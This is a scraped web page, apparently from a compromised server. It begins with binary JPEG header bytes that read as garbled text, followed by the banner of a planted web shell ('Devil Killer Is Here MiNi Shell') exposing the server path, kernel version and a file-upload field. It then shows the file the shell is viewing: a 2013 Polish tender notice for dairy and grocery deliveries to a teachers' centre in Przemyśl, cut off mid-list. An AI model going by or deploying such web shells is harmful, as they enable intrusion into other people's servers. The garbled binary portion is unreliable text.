JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130704/134167-N-2013.html

<p class="kh_header"><b>Rzeszów: Sukcesywna dostawa produktów mleczarskich, przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu</b><br>
<b>Numer ogłoszenia: 134167 - 2013; data zamieszczenia: 04.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie , ul. Niedzielskiego 2, 35-036 Rzeszów, woj. podkarpackie, tel. 17 8534097, faks 17 8534682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa produktów mleczarskich, przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa produktów mleczarskich, przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu, 37-700 Przemyśl, ul. Kraszewskiego 7a, w tym na potrzeby projektu systemowego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim.

Przedmiot zamówienia został podzielony na następujące części: Część I Sukcesywna dostawa produktów mleczarskich dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu: Jogurt naturalny, opakowanie min. 370 g 15 szt., Masło extra 200 g 82% tłuszczu 250 szt., Mleczko zagęszczone niesłodzone, opakowanie 500 g karton 7,5 % tłuszczu 500 szt., Mleko  UHT 2 % karton z możliwością wielokrotnego otwierania i zamykania  1l 30 szt., Ser biały półtłusty, opakowanie 250 g 20 szt., Ser miękki w kostce sałatko-kanapkowy, opakowanie 200-270 g 20 szt., Ser twarogowy półtłusty 40 kg, Ser żółty typu edamski 70 kg, Ser camembert, opakowanie min. 120g 40 szt., Serek topiony różne smaki, opakowanie min. 100 g 40 szt., Serek topiony min. 8 porcji krążek różne smaki, opakowanie min. 140g 50 op., Śmietana 18%, opakowanie min. 380g 180 szt.

Część II Sukcesywna dostawa produktów przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu: Koncentrat barszczu czerwonego, butelka min. 300 ml 30 szt., Cukier biały sypki, opakowanie 1 kg 200 szt., Cukier puder, opakowanie min. 0,4 kg 10 szt., Cukier wanilinowy, opakowanie min. 30 g 10 szt., Kasza gryczana w saszetkach, opakowanie 4 szt. x min. 100 g 10 op., Kasza gryczana, opakowanie min. 0,4 kg 10 szt., Proszek do pieczenia, opakowanie min. 30g 10 szt., Makaron małe muszelki, opakowanie 0,5 kg 20 szt., Makaron świderki, opanowanie 0,5 kg 20 szt., Makaron kolanka, opanowanie 0,5 kg 20 szt., Czosnek granulowany, opakowanie min. 1000g 10 szt., Drożdże świeże, opakowanie 100 g 5 szt., Estragon, opakowanie min. 10 g 5 szt., Galaretka owocowa w proszku różne smaki, opakowanie min. 70g 5 szt., Gałka muszkatołowa mielona, opakowanie min.10g 5 szt., Groszek ptysiowy, opakowanie min.100 g 40 szt., Herbata expresowa czarna, opakowanie min. 50 torebek z zawieszką 40 szt., Herbata expresowa czarna, opakowanie min. 100 torebek z zawieszką 60 szt., Herbata expresowa czarna, opakowanie min. 100 torebek 30 szt., Kasza jęczmienna perłowa, opakowanie min. 400g 25 szt., Kasza manna błyskawiczna, opakowanie min. 500g 5 szt., Kawa naturalna drobnomielona, opakowanie próżniowe min. 250g 60 szt., Kawa naturalna drobnomielona, opakowanie hermetyczne min. 220g 80 szt., Kawa rozpuszczalna typu creme, 100% kawy naturalnej, opakowanie  min. 180g 50 szt., Kawa rozpuszczalna granulowana, 100% kawy naturalnej, opakowanie min. 200g 20 szt., Kawa rozpuszczalna liofilizowana (forma łupków, kryształków), 100% kawy naturalnej, opakowanie min. 200g 20 szt., Kawa rozpuszczalna typu creme, 100% kawy naturalnej, opakowanie  min. 100g 25 szt., Kawa naturalna ziarnista do ekspresu, opakowanie min. 0,5kg 15 szt., Ketchup, opakowanie min. 900g 10 szt., Kminek cały, opakowanie min. 20 g 10 szt., Kminek mielony, opakowanie min. 20 g 5 szt., Koncentrat pomidorowy 30%, opakowanie min. 800g 30 szt., Rosół drobiowy w kostkach, opakowanie min. 12 kostek 10 szt., Kwasek cytrynowy spożywczy, opakowanie min. 20 g 50 szt., Liść laurowy, opakowanie min. 100g 20 szt., Majeranek, opakowanie min. 400 g 20 szt., Majonez, opakowanie min. 700ml 50 szt., Makaron krajanka nitki minimum 4 jajeczny, opakowanie 250 g 100 szt., Makaron duże muszle, opakowanie 500 g 10 szt., Makaron w kształcie ryżu, opakowanie 250g 15 szt., Makaron spaghetti, opakowanie 500g 10 szt., Mąka luksusowa pszenna typ 550, opakowanie 1kg 60 kg, Musztarda o jednolitej konsystencji, opakowanie min. 180g 20 szt., Ocet spirytusowy 10%, butelka 0,5l 5 szt., Papryka mielona ostra, opakowanie min. 20 g 40 szt., Papryka mielona słodka, opakowanie min. 20 g 40 szt., Pieprz czarny mielony, opakowanie 1kg 10 kg, Płatki śniadaniowe kukurydziane, opakowanie min. 500g 15 szt., Przecier ogórkowy w słoiku, słoik min. 280 g 20 szt., Przyprawa sypka do kurczaka/drobiu, opakowanie min. 25 g 30 szt., Przyprawa sypka do gyrosa, opakowanie min. 30 g 60 szt., Przyprawa sypka warzywna z cząsteczkami warzyw, opakowanie min. 1kg 30 szt., Przyprawa w płynie m.in. do zup i sosów, opakowanie min. 960 g 10 szt., Ryż biały długoziarnisty, opakowanie 1 kg 20 kg, Sos czosnkowy, opakowanie min. 240 ml 20 szt., Sos pieczeniowy w proszku, opakowanie min. 30 g 50 szt., Sos sałatkowy w proszku (różne rodzaje), opakowanie min. 9 g 50 szt., Sól spożywcza, opakowanie 1 kg 40 kg, Zioła prowansalskie, opakowanie min.10 g 10 szt., Żelatyna spożywcza, opakowanie min. 50g 30 szt., Żurek w proszku, opakowanie min. 45 g 60 szt., Zupa pieczarkowa w proszku, opakowanie min. 45 g 30 szt., Ziele angielskie ziarno, opakowanie min. 400g 4 szt., Zupa ogonowa w proszku, opakowanie min. 45 g 30 szt., Mąka ziemniaczana, opakowanie 1kg 10 szt., Zaprawa cytrynowa, opakowanie min. 0,2 l 40 szt., Olej spożywczy roślinny, opakowanie 1 l 20 szt., Śmietanka w płynie do kawy, opakowanie  10 szt. x min. 10 ml 20 op., Bułka tarta, opakowanie 500 g 30 szt., Bita śmietana w sprayu, opakowanie min. 250 ml 10 szt., Olej spożywczy roślinny, opakowanie 3 l 25 szt., Brzoskwinie połówki w syropie, puszka min. 820 g 10 szt., Oliwa z oliwek, opakowanie 1 l 5 szt., Ćwikła z chrzanem, opakowanie min. 270g 500 szt., Ananas plastry w syropie, puszka min. 580g 50 szt., Chrzan tarty, słoik min. 180 g 20 szt., Dżem różne smaki, słoik min. 280 g 30 szt., Dżem różne smaki, opakowanie jednorazowe min. 25g 700 szt., Fasola czerwona, puszka min. 400g 30 szt., Filet z makreli w sosie pomidorowym, puszka min. 170 g 20 szt., Groszek konserwowy, puszka min. 400 g 40 szt., Grzyb suszony borowik, opakowanie min. 40 g 10 szt., Gulasz angielski, puszka min. 290 g 30 szt., Kapusta biała kiszona 100 kg, Miód pszczeli, opakowanie jednorazowe min. 25g 300 szt., Kukurydza konserwowa, puszka min. 340 g 60 szt., Kukurydza mini kolby w zalewie, opakowanie min. 300 g 30 szt., Miód sztuczny, słoik min. 370 g 3 szt., Ogórek kiszony, opakowanie min. 880 g 40 szt., Ogórek konserwowy mini, słoik min. 300 g 20 szt., Ogórek konserwowy, słoik min. 880 g 60 szt., Oliwki drylowane czarne, słoik min. 900 g 15 szt., Oliwki drylowane zielone, słoik min. 900 g 15 szt., Papryka konserwowa połówki, słoik min. 800 g 40 szt., Pasztet drobiowy z dodatkami, opakowanie min.130 g 250 szt., Pieczarki marynowane, słoik min. 700g 20 szt., Rodzynki, opakowanie min. 100 g 10 szt., Sałatka grecka, słoik min. 900 ml 40 szt., Sałatka wielowarzywna, słoik min. 900 ml 50 szt., Seler marynowany w zalewie nitki, słoik min. 1,7 kg 20 szt., Tuńczyk w sosie własnym kawałki, puszka min. 170g 30 szt., Seler marynowany w zalewie nitki, słoik min. 900 ml 50 szt., Śliwka suszona, opakowanie min. 150g 10 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.86.00.00-4, 15.87.10.00-4, 15.60.00.00-4, 15.83.00.00-5, 15.87.24.00-5, 15.85.10.00-8, 15.87.00.00-7, 15.87.12.73-8, 15.87.12.30-5, 15.89.10.00-0, 15.89.80.00-9, 15.33.14.27-6, 15.33.22.40-8, 15.89.40.00-1, 15.33.00.00-0, 15.33.14.00-1, 15.13.10.00-5, 15.23.50.00-4, 15.33.11.35-2, 15.83.16.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ubiegający się o udzielenie zamówienia publicznego zobowiązany jest złożyć: a. Wypełniony druk Oferta- załącznik nr 2 do SIWZ wraz z formularzem cenowym/formularzami cenowymi odpowiednimi dla części zamówienia na którą składana jest oferta - odpowiednie załączniki nr 1a - b do SIWZ. Dla uznania ważności, oferta musi zawierać: wszystkie wymagane w SIWZ dokumenty, które należy przedstawić w formie oryginałów lub poświadczone za zgodność z oryginałem ich kopie. Poświadczenie powinno być opatrzone podpisem osoby upoważnionej do reprezentowania Wykonawcy i opatrzone klauzulą ZA ZGODNOŚĆ Z ORYGINAŁEM. b. Pełnomocnictwo do reprezentowania Wykonawcy (w przypadku gdy nie wynika ono z załączonych dokumentów) - np. według załącznika nr 5 do SIWZ. c. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy. 
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w zakresie: a. zmiany wynagrodzenia Wykonawcy za wykonanie zamówienia, w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług, b. zmiany terminu wykonania zamówienia w przypadku wystąpienia: - siły wyższej. Siła wyższa - oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu, - innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie nie są zasadne, Wykonawca zobowiązany jest do realizacji zadania zgodnie z zawartą umową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pcen.pl/zamowienia-publiczne/postepowania-powyzej-14-tys.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, ul. Niedzielskiego 2, 35-036 Rzeszów, pokój 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2013 godzina 10:00, miejsce: Podkarpackie Centrum Edukacji Nauczycieli w Rzeszowie, ul. Niedzielskiego 2, 35-036 Rzeszów, pokój nr 1 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest sukcesywna dostawa produktów mleczarskich, przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu, 37-700 Przemyśl, ul. Kraszewskiego 7a, w tym na potrzeby projektu systemowego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego: Edukacja skuteczna, przyjazna, nowoczesna - rozwój kompetencji kadry zarządzającej i pedagogicznej szkół i placówek oświatowych w województwie podkarpackim..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa produktów mleczarskich dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny, opakowanie min. 370 g 15 szt., Masło extra 200 g 82% tłuszczu 250 szt., Mleczko zagęszczone niesłodzone, opakowanie 500 g karton 7,5 % tłuszczu 500 szt., Mleko  UHT 2 % karton z możliwością wielokrotnego otwierania i zamykania  1l 30 szt., Ser biały półtłusty, opakowanie 250 g 20 szt., Ser miękki w kostce sałatko-kanapkowy, opakowanie 200-270 g 20 szt., Ser twarogowy półtłusty 40 kg, Ser żółty typu edamski 70 kg, Ser camembert, opakowanie min. 120g 40 szt., Serek topiony różne smaki, opakowanie min. 100 g 40 szt., Serek topiony min. 8 porcji krążek różne smaki, opakowanie min. 140g 50 op., Śmietana 18%, opakowanie min. 380g 180 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa produktów przetworzonych, sypkich oraz przypraw dla potrzeb PCEN w Rzeszowie Oddział w Przemyślu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koncentrat barszczu czerwonego, butelka min. 300 ml 30 szt., Cukier biały sypki, opakowanie 1 kg 200 szt., Cukier puder, opakowanie min. 0,4 kg 10 szt., Cukier wanilinowy, opakowanie min. 30 g 10 szt., Kasza gryczana w saszetkach, opakowanie 4 szt. x min. 100 g 10 op., Kasza gryczana, opakowanie min. 0,4 kg 10 szt., Proszek do pieczenia, opakowanie min. 30g 10 szt., Makaron małe muszelki, opakowanie 0,5 kg 20 szt., Makaron świderki, opanowanie 0,5 kg 20 szt., Makaron kolanka, opanowanie 0,5 kg 20 szt., Czosnek granulowany, opakowanie min. 1000g 10 szt., Drożdże świeże, opakowanie 100 g 5 szt., Estragon, opakowanie min. 10 g 5 szt., Galaretka owocowa w proszku różne smaki, opakowanie min. 70g 5 szt., Gałka muszkatołowa mielona, opakowanie min.10g 5 szt., Groszek ptysiowy, opakowanie min.100 g 40 szt., Herbata expresowa czarna, opakowanie min. 50 torebek z zawieszką 40 szt., Herbata expresowa czarna, opakowanie min. 100 torebek z zawieszką 60 szt., Herbata expresowa czarna, opakowanie min. 100 torebek 30 szt., Kasza jęczmienna perłowa, opakowanie min. 400g 25 szt., Kasza manna błyskawiczna, opakowanie min. 500g 5 szt., Kawa naturalna drobnomielona, opakowanie próżniowe min. 250g 60 szt., Kawa naturalna drobnomielona, opakowanie hermetyczne min. 220g 80 szt., Kawa rozpuszczalna typu creme, 100% kawy naturalnej, opakowanie  min. 180g 50 szt., Kawa rozpuszczalna granulowana, 100% kawy naturalnej, opakowanie min. 200g 20 szt., Kawa rozpuszczalna liofilizowana (forma łupków, kryształków), 100% kawy naturalnej, opakowanie min. 200g 20 szt., Kawa rozpuszczalna typu creme, 100% kawy naturalnej, opakowanie  min. 100g 25 szt., Kawa naturalna ziarnista do ekspresu, opakowanie min. 0,5kg 15 szt., Ketchup, opakowanie min. 900g 10 szt., Kminek cały, opakowanie min. 20 g 10 szt., Kminek mielony, opakowanie min. 20 g 5 szt., Koncentrat pomidorowy 30%, opakowanie min. 800g 30 szt., Rosół drobiowy w kostkach, opakowanie min. 12 kostek 10 szt., Kwasek cytrynowy spożywczy, opakowanie min. 20 g 50 szt., Liść laurowy, opakowanie min. 100g 20 szt., Majeranek, opakowanie min. 400 g 20 szt., Majonez, opakowanie min. 700ml 50 szt., Makaron krajanka nitki minimum 4 jajeczny, opakowanie 250 g 100 szt., Makaron duże muszle, opakowanie 500 g 10 szt., Makaron w kształcie ryżu, opakowanie 250g 15 szt., Makaron spaghetti, opakowanie 500g 10 szt., Mąka luksusowa pszenna typ 550, opakowanie 1kg 60 kg, Musztarda o jednolitej konsystencji, opakowanie min. 180g 20 szt., Ocet spirytusowy 10%, butelka 0,5l 5 szt., Papryka mielona ostra, opakowanie min. 20 g 40 szt., Papryka mielona słodka, opakowanie min. 20 g 40 szt., Pieprz czarny mielony, opakowanie 1kg 10 kg, Płatki śniadaniowe kukurydziane, opakowanie min. 500g 15 szt., Przecier ogórkowy w słoiku, słoik min. 280 g 20 szt., Przyprawa sypka do kurczaka/drobiu, opakowanie min. 25 g 30 szt., Przyprawa sypka do gyrosa, opakowanie min. 30 g 60 szt., Przyprawa sypka warzywna z cząsteczkami warzyw, opakowanie min. 1kg 30 szt., Przyprawa w płynie m.in. do zup i sosów, opakowanie min. 960 g 10 szt., Ryż biały długoziarnisty, opakowanie 1 